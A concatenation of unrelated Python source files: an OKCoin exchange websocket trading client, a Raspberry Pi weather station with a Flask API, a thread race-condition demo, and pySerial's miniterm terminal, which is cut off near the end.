#######################
## 通用函数
#######################
#----------------------------------------------------------------------
def readData(self, evt):
"""解压缩推送收到的数据"""
# 创建解压器
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
# 将原始数据解压成字符串
inflated = decompress.decompress(evt) + decompress.flush()
# 通过json解析字符串
data = json.loads(inflated)
return data
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
print 'onMessage'
data = self.readData(evt)
print data
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
print 'onError'
print evt
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
print 'onClose'
#----------------------------------------------------------------------
def onOpen(self, ws):
"""接口打开"""
print 'onOpen'
#----------------------------------------------------------------------
def connect(self, host, apiKey, secretKey, trace=False):
"""连接服务器"""
self.host = host
self.apiKey = apiKey
self.secretKey = secretKey
if self.host == OKCOIN_CNY:
self.currency = CURRENCY_CNY
else:
self.currency = CURRENCY_USD
websocket.enableTrace(trace)
self.ws = websocket.WebSocketApp(host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
#----------------------------------------------------------------------
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
#----------------------------------------------------------------------
def sendMarketDataRequest(self, channel):
"""发送行情请求"""
# 生成请求
d = {}
d['event'] = 'addChannel'
d['binary'] = True
d['channel'] = channel
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def sendTradingRequest(self, channel, params):
"""发送交易请求"""
# 在参数字典中加上api_key和签名字段
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'addChannel'
d['binary'] = True
d['channel'] = channel
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#######################
## 现货相关
#######################
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货普通报价"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_ticker' %(self.currency, symbol))
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth):
"""订阅现货深度报价"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_depth_%s' %(self.currency, symbol, depth))
#----------------------------------------------------------------------
def subscribeSpotTradeData(self, symbol):
"""订阅现货成交记录"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_trades' %(self.currency, symbol))
#----------------------------------------------------------------------
def subscribeSpotKline(self, symbol, interval):
"""订阅现货K线"""
self.sendMarketDataRequest('ok_sub_spot%s_%s_kline_%s' %(self.currency, symbol, interval))
#----------------------------------------------------------------------
def spotTrade(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot%s_trade' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
channel = 'ok_spot%s_cancel_order' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
channel = 'ok_spot%s_orderinfo' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def subscribeSpotTrades(self):
"""订阅现货成交信息"""
channel = 'ok_sub_spot%s_trades' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeSpotUserInfo(self):
"""订阅现货账户信息"""
channel = 'ok_sub_spot%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#######################
## 期货相关
#######################
#----------------------------------------------------------------------
def subscribeFutureTicker(self, symbol, expiry):
"""订阅期货普通报价"""
self.sendMarketDataRequest('ok_sub_future%s_%s_ticker_%s' %(self.currency, symbol, expiry))
#----------------------------------------------------------------------
def subscribeFutureDepth(self, symbol, expiry, depth):
"""订阅期货深度报价"""
self.sendMarketDataRequest('ok_sub_future%s_%s_depth_%s_%s' %(self.currency, symbol,
expiry, depth))
#----------------------------------------------------------------------
def subscribeFutureTradeData(self, symbol, expiry):
"""订阅期货成交记录"""
self.sendMarketDataRequest('ok_sub_future%s_%s_trade_%s' %(self.currency, symbol, expiry))
#----------------------------------------------------------------------
def subscribeFutureKline(self, symbol, expiry, interval):
"""订阅期货K线"""
self.sendMarketDataRequest('ok_sub_future%s_%s_kline_%s_%s' %(self.currency, symbol,
expiry, interval))
#----------------------------------------------------------------------
def subscribeFutureIndex(self, symbol):
"""订阅期货指数"""
self.sendMarketDataRequest('ok_sub_future%s_%s_index' %(self.currency, symbol))
#----------------------------------------------------------------------
def futureTrade(self, symbol, expiry, type_, price, amount, order, leverage):
"""期货委托"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
params['contract_type'] = str(expiry)
params['match_price'] = str(order)
params['lever_rate'] = str(leverage)
channel = 'ok_future%s_trade' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futureCancelOrder(self, symbol, expiry, orderid):
"""期货撤单"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
params['contract_type'] = str(expiry)
channel = 'ok_future%s_cancel_order' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futureUserInfo(self):
"""查询期货账户"""
channel = 'ok_future%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def futureOrderInfo(self, symbol, expiry, orderid, status, page, length):
"""查询期货委托信息"""
params = {}
params['symbol'] = str(symbol+self.currency)
params['order_id'] = str(orderid)
params['contract_type'] = expiry
params['status'] = status
params['current_page'] = page
params['page_length'] = length
channel = 'ok_future%s_orderinfo' %(self.currency)
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def subscribeFutureTrades(self):
"""订阅期货成交信息"""
channel = 'ok_sub_future%s_trades' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFutureUserInfo(self):
"""订阅期货账户信息"""
channel = 'ok_sub_future%s_userinfo' %(self.currency)
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturePositions(self):
"""订阅期货持仓信息"""
channel = 'ok_sub_future%s_positions' %(self.currency)
self.sendTradingRequest(channel, {})
|
weather_base_station.py
|
#! /usr/bin/env python3
import time
import sqlite3
import RPi.GPIO as GPIO
import threading
from flask import Flask, request, jsonify
from flask_cors import CORS
from datetime import datetime
from struct import *
from RF24 import *
from RF24Network import *
def create_database():
conn = sqlite3.connect("weather.db")
cursor = conn.cursor()
cursor.execute(
"""CREATE TABLE IF NOT EXISTS weather(
id INTEGER PRIMARY KEY AUTOINCREMENT,
date TIMESTAMP,
station INTEGER,
temp REAL,
humi REAL,
alti REAL,
pres REAL
)""")
conn.close()
def insert_wheater_data(conn, params):
cursor = conn.cursor()
sqlite_insert_with_param = """INSERT INTO weather
(date, station, temp, humi, alti, pres) VALUES (?, ?, ?, ?, ?, ?)"""
cursor.execute(sqlite_insert_with_param, params)
conn.commit()
def start_radio_capture():
radio = RF24(22,0)
network = RF24Network(radio)
conn = sqlite3.connect("weather.db")
octlit = lambda n:int(n, 8)
# Address of our node in Octal format (01, 021, etc)
this_node = octlit("00")
# Address of the other node
other_node = octlit("01")
radio.begin()
radio.setDataRate(RF24_250KBPS)
time.sleep(0.1)
network.begin(120, this_node) # channel 120
radio.printDetails()
while 1:
network.update()
while network.available():
header, payload = network.read(16)
temp, humi, pres, alti = unpack('<ffff', bytes(payload))
data_tuple = (datetime.now(), header.from_node, temp, humi, alti, pres)
insert_wheater_data(conn, data_tuple)
print(f'[{data_tuple[0]}] (Station: {data_tuple[1]}, Temp: {temp:.2f}, Humi: {humi:.2f}, Pres: {pres:.2f}, Alti: {alti:.2f})')
time.sleep(5)
if __name__ == "__main__":
create_database()
radioThread = threading.Thread(target=start_radio_capture)
radioThread.start()
time.sleep(1)
app = Flask(__name__)
CORS(app)
#app.config["DEBUG"] = True
@app.route("/weather", methods=["GET"])
def get_wheater_data():
if 'station' in request.args:
station = int(request.args["station"])
else:
return jsonify({"error": "The station variable must be passed on the request"})
if 'limit' in request.args:
limit = int(request.args["limit"])
else:
limit = 1
weather_select_query = """SELECT * FROM weather WHERE station = ? ORDER BY date DESC LIMIT ?"""
conn = sqlite3.connect("weather.db")
results = []
cursor = conn.cursor()
cursor.execute(weather_select_query, (station, limit,))
records = cursor.fetchall()
for row in records:
result = {
"id":row[0],
"date": row[1],
"station": row[2],
"temp": row[3],
"humi": row[4],
"alti": row[5],
"pres": row[6]}
results.append(result)
cursor.close()
return jsonify(results)
app.run(host="0.0.0.0", port=5000)
|
thread-add-random.py
|
"prints different results on different runs on Windows 7"
import threading, time
count = 0
def adder():
global count
count = count + 1 # update a shared name in global scope
time.sleep(0.5) # threads share object memory and global names
count = count + 1
threads = []
for i in range(100):
thread = threading.Thread(target=adder, args=())
thread.start()
threads.append(thread)
for thread in threads: thread.join()
print(count)
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
